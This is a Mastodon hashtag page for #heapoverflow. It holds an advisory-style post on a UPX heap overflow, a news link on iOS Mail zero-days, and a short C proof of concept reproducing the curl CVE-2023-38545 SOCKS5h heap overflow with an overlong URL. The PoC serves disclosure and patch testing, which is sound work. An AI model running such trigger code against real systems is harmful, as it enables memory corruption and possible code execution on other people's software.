🛡 H3lium@infosec.exchange/:~# :blinking_cursor:<p><strong>Heap Buffer Overflow in UPX Identified</strong></p><p><strong>Date</strong>: March 26, 2024<br><strong>CVE</strong>: To be assigned<br><strong>Vulnerability Type</strong>: Buffer Errors<br><strong>CWE</strong>: [[CWE-122]]<br><strong>Sources</strong>: <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3209" rel="nofollow noopener" target="_blank">NIST</a> <a href="https://vuldb.com/?ctiid.259055" rel="nofollow noopener" target="_blank">VULNDB</a> <a href="https://vuldb.com/?submit.304575" rel="nofollow noopener" target="_blank">VULNDB Submit</a></p><p><strong>Issue Summary</strong></p><p>A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit <code>06b0de9c77551cd4e856d453e094d8a0b6ef0d6d</code>. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.</p><p><strong>Technical Key findings</strong></p><p>The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.</p><p><strong>Vulnerable products</strong></p><ul><li>[[UPX]] version identified by commit <code>06b0de9c77551cd4e856d453e094d8a0b6ef0d6d</code>.</li></ul><p><strong>Impact assessment</strong></p><p>An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.</p><p><strong>Patches or workaround</strong></p><p>No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.</p><p><strong>Tags</strong></p><p><a href="https://infosec.exchange/tags/UPX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>UPX</span></a> <a href="https://infosec.exchange/tags/BufferOverflow" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BufferOverflow</span></a> <a href="https://infosec.exchange/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HeapOverflow</span></a> <a href="https://infosec.exchange/tags/SecurityVulnerability" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityVulnerability</span></a> <a href="https://infosec.exchange/tags/CVE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CVE</span></a></p>
101010.pl is one of the many independent Mastodon servers you can use to participate in the fediverse.
101010.pl czyli najstarszy polski serwer Mastodon. Posiadamy wpisy do 2048 znaków.
Administered by:
Server stats:
480active users
101010.pl: About · Status · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.5.0-alpha.1
#heapoverflow
0 posts · 0 participants · 0 posts today
Harry Sintonen<p>Here’s a quick proof of concept to reproduce the <a href="https://infosec.exchange/tags/curl" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>curl</span></a> <a href="https://infosec.exchange/tags/CVE202338545" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CVE202338545</span></a> <a href="https://infosec.exchange/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>heapoverflow</span></a> <a href="https://infosec.exchange/tags/vulnerability" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>vulnerability</span></a>. This PoC expects localhost to run a <a href="https://infosec.exchange/tags/socks5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>socks5</span></a> proxy:</p><p>gcc -xc -fsanitize=address - -lcurl <<EOF<br># include <curl/curl.h><br># include <string.h><br>int main(void)<br>{<br> CURL *curl = curl_easy_init();<br> if(curl) {<br> char url[32768];<br> memcpy(url, "https://", 8);<br> memset(url + 8, 'A', sizeof(url) - 8 - 1);<br> url[sizeof(url) - 1] = '\0';<br> curl_easy_setopt(curl, CURLOPT_URL, url);<br> (void)curl_easy_perform(curl);<br> curl_easy_cleanup(curl);<br> }<br> return 0;<br>}<br>EOF<br>https_proxy=socks5h://127.0.0.1 ./a.out</p><p>Some comments:<br>• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).<br>• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.<br>• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.<br>• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at <a href="https://curl.se/docs/CVE-2023-38545.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">curl.se/docs/CVE-2023-38545.ht</span><span class="invisible">ml</span></a> for more details.</p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
Astra Kernel :verified:<p>For <a href="https://infosec.exchange/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HeapOverflow</span></a> it is not writing the vulnerable code 😲🤔</p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/chatgpt" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>chatgpt</span></a> <a href="https://infosec.exchange/tags/openai" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>openai</span></a></p>
ITSEC News<p>Apple Patches Two iOS Zero-Days Abused for Years - Researchers revealed two zero-day security vulnerabilities affecting Apple's stock Mail app on iOS... more: <a href="https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/" rel="nofollow noopener" target="_blank"><span class="invisible">https://</span><span class="ellipsis">threatpost.com/apple-patches-t</span><span class="invisible">wo-ios-zero-days-abused-for-years/155042/</span></a> <a href="https://schleuss.online/tags/vulnerabilities" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>vulnerabilities</span></a> <a href="https://schleuss.online/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>heapoverflow</span></a> <a href="https://schleuss.online/tags/ioszeroday" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ioszeroday</span></a> <a href="https://schleuss.online/tags/ios13" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ios13</span></a>.4.5 <a href="https://schleuss.online/tags/iphone" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>iphone</span></a> <a href="https://schleuss.online/tags/hacks" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hacks</span></a> <a href="https://schleuss.online/tags/ipad" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ipad</span></a></p>
TrendingLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
Create accountLoginDrag & drop to upload